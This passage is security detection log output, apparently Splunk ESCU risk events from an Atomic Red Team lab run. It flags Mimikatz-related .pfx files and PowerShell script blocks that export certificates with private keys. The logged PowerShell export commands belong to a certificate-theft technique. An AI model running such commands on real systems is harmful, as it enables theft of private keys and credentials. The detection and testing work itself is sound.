16:13:23.489", file_name="atomic.pfx", file_path="C:\\Temp\\atomic.pfx", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:13:23", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1682702677, search_name="ESCU - Windows PowerShell Export PfxCertificate - Rule", EventCode="4104", ScriptBlockText="{$mypwd = ConvertTo-SecureString -String \"AtomicRedTeam\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1552.004\", \"T1552\", \"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="T1552", annotations._all="CIS 10", annotations._all="T1552.004", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1552.004", annotations.mitre_attack="T1552", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702674.628962000", lastTime="2023-04-28T16:13:47", risk_message="A PowerShell Cmdlet related to exporting a PFX Certificate was ran on mswin-server.attackrange.local, attempting to export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the PowerShell Cmdlet export-pfxcertificate utilizing Script Block Logging. This particular behavior is related to an adversary attempting to steal certificates local to the Windows endpoint within the Certificate Store.", user_id="'S-1-5-21-3439621488-2671704973-1532913862-500'" 1682702677, search_name="ESCU - Windows PowerShell Export PfxCertificate - Rule", EventCode="4104", ScriptBlockText="& {$mypwd = ConvertTo-SecureString -String \"AtomicRedTeam\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1552.004\", \"T1552\", \"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="T1552", annotations._all="CIS 10", annotations._all="T1552.004", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1552.004", annotations.mitre_attack="T1552", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702674.628962000", lastTime="2023-04-28T16:13:47", risk_message="A PowerShell Cmdlet related to exporting a PFX Certificate was ran on mswin-server.attackrange.local, attempting to export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the PowerShell Cmdlet export-pfxcertificate utilizing Script Block Logging. This particular behavior is related to an adversary attempting to steal certificates local to the Windows endpoint within the Certificate Store.", user_id="'S-1-5-21-3439621488-2671704973-1532913862-500'" 1682701405, search_name="ESCU - Windows PowerShell Export Certificate - Rule", EventCode="4104", ScriptBlockText="{$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1552.004\", \"T1552\", \"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="T1552.004", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._all="DE.AE", annotations._all="T1552", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1552.004", annotations.mitre_attack="T1552", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682701403.244879000", lastTime="2023-04-28T16:13:58", risk_message="A PowerShell Cmdlet related to exporting a Certificate was ran on mswin-server.attackrange.local, attempting to export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the PowerShell Cmdlet export-certificate utilizing Script Block Logging. This particular behavior is related to an adversary attempting to steal certificates local to the Windows endpoint within the Certificate Store.", user_id="'S-1-5-21-3439621488-2671704973-1532913862-500'" 1682701405, search_name="ESCU - Windows PowerShell Export Certificate - Rule", EventCode="4104", ScriptBlockText="& {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1552.004\", \"T1552\", \"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="T1552.004", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._all="DE.AE", annotations._all="T1552", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1552.004", annotations.mitre_attack="T1552", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682701403.244879000", lastTime="2023-04-28T16:13:58", risk_message="A PowerShell Cmdlet related to exporting a Certificate was ran on mswin-server.attackrange.local, attempting to export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the PowerShell Cmdlet export-certificate utilizing Script Block Logging. This particular behavior is related to an adversary attempting to steal certificates local to the Windows endpoint within the Certificate Store.", user_id="'S-1-5-21-3439621488-2671704973-1532913862-500'" 1681956000, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1681956000", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-20 02:56:56.065", file_name="self-signed-cert.pfx", file_path="C:\\Users\\Administrator\\Documents\\adversary_emulation_library\\carbanak\\Resources\\step7\\self-signed-cert.pfx", firstTime="2023-04-20T02:56:56", info_max_time="1681962600.000000000", info_min_time="1681959000.000000000", info_search_time="1681964782.803141000", lastTime="2023-04-20T02:56:56", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1681956000, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1681956000", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-20 02:56:55.635", file_name="shockwave.local.pfx", file_path="C:\\Users\\Administrator\\Documents\\adversary_emulation_library\\apt29\\Resources\\Scenario_1\\shockwave.local.pfx", firstTime="2023-04-20T02:56:55", info_max_time="1681962600.000000000", info_min_time="1681959000.000000000", info_search_time="1681964782.803141000", lastTime="2023-04-20T02:56:55", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1681956000, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1681956000", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-20 02:56:55.162", file_name="shockwave.local.pfx", file_path="C:\\Users\\Administrator\\Documents\\adversary_emulation_library\\apt29\\Archive\\Emulation_Plan\\Day 1\\payloads\\shockwave.local.pfx", firstTime="2023-04-20T02:56:55", info_max_time="1681962600.000000000", info_min_time="1681959000.000000000", info_search_time="1681964782.803141000", lastTime="2023-04-20T02:56:55", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1681956000, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1681956000", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-20 02:56:54.671", file_name="dmevals.local.pfx", file_path="C:\\Users\\Administrator\\Documents\\adversary_emulation_library\\apt29\\Archive\\CALDERA_DIY\\evals\\payloads\\dmevals.local.pfx", firstTime="2023-04-20T02:56:54", info_max_time="1681962600.000000000", info_min_time="1681959000.000000000", info_search_time="1681964782.803141000", lastTime="2023-04-20T02:56:54", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported."